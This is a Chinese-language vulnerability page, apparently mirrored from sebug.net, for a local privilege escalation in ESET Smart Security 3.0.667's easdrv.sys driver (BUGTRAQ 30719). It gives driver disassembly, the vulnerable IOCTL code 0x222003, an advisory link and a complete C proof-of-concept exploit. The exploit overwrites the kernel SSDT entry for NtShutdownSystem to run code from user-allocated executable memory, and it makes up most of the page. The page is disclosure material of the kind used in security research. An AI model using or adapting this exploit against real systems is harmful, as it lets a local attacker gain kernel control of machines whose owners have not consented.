|
:::决晓网络研究阵地:::
Eset Software Smart Security 3.0.667
描述:
BUGTRAQ ID: 30719
CNCAN ID:CNCAN-2008081903
ESET Smart Security是一款集成防火墙,反病毒的应用软件。
ESET Smart Security 'easdrv.sys'驱动存在输入检查问题,本地攻击者可以利用漏洞以内核进程权限执行任意指令。
文件:easdrv.sys
.text:00012B92 loc_12B92:
.text:00012B92 push [ebp+InputBuf]
.text:00012B95 call ds:off_1A200[eax]
.text:00012B9B mov ecx, [ebp+OutputBuffer]
.text:00012B9E mov [ecx], eax
ProbeForRead/Write没有检查输入和输出指针,当input/output指向内核模式内存(高于0x80000000)会导致蓝屏。
上面的代码可通过发送IoControlCode = 0x222003到设备\\.\\easdrv来触及。
<* 参考
http://www.orange-bat.com/adv/2008/adv.08.14.txt
*>
测试方法:
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
//
// ESET SmartSecurity priv. escalation
//
// visit www.orange-bat.com for full advisory
//
// g_
// g_ # orange-bat # com
#include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>
void TextError(LPTSTR lpszFunction)
{
// Retrieve the system error message for the last-error code
LPVOID lpMsgBuf;
LPVOID lpDisplayBuf;
DWORD dw = GetLastError();
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
dw,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0, NULL );
// Display the error message and exit the process
lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,
(lstrlen((LPCTSTR)lpMsgBuf)+lstrlen((LPCTSTR)lpszFunction)+40)*sizeof(TCHAR));
sprintf((LPTSTR)lpDisplayBuf,
TEXT("%s failed with error %d: %s"),
lpszFunction, dw, lpMsgBuf);
//MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK);
printf(lpDisplayBuf);
LocalFree(lpMsgBuf);
LocalFree(lpDisplayBuf);
}
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
HANDLE hDevice; // handle to the drive to be examined
BOOL bResult; // results flag
DWORD junk; // discard results
IO_STATUS_BLOCK IoStatusBlock;
hDevice = CreateFile(DeviceName,
0, // no access to the drive
FILE_SHARE_READ | // share mode
FILE_SHARE_WRITE,
NULL, // default security attributes
OPEN_EXISTING, // disposition
0, // file attributes
NULL); // do not copy file attributes
if (hDevice == INVALID_HANDLE_VALUE) // cannot open the drive
{
TextError("CreateFile");
return (FALSE);
}
bResult = DeviceIoControl(hDevice, // device to be queried
Ioctl,
(PVOID)InputBuffer,
InputLen,
(PVOID)OutputBuffer,
OutputLen, // output buffer
&junk, // # bytes returned
(LPOVERLAPPED)NULL); // synchronous I/O
if(!bResult){
TextError("DeviceIoControl");
}
CloseHandle(hDevice);
return TRUE;
}
int AllocMem(DWORD lpBase){
PVOID lpvResult;
lpvResult = VirtualAlloc(
(LPVOID) lpBase, // Next page to commit
0x1337, // Page size, in bytes
MEM_COMMIT, // Allocate a committed page
PAGE_EXECUTE_READWRITE); // Read/write access
if (lpvResult == NULL ){
TextError("VirtualAlloc");
return 0;
}
else {
printf("VirtualAlloc success\n");
}
return 1;
}
int main(int argc, char *argv[])
{
DWORD Ioctl, Input, ILen, Output, OLen;
DWORD SSDT;
if(!AllocMem(0x80000)){
return 1;
}
Input = 12345678;
SSDT = 0x80501414; //80501414 8060786e nt!NtShutdownSystem
Output = 0;
if(TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT-1, 4)){
TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT+2, 4);
printf("NtShutdownSystem now points to 0x80000 :)");
printf("Jump to hyperspace in 2 seconds..");
Sleep(2*1000);
NtShutdownSystem(0);
}
else{
printf("Failed to open device");
}
return 0;
} |
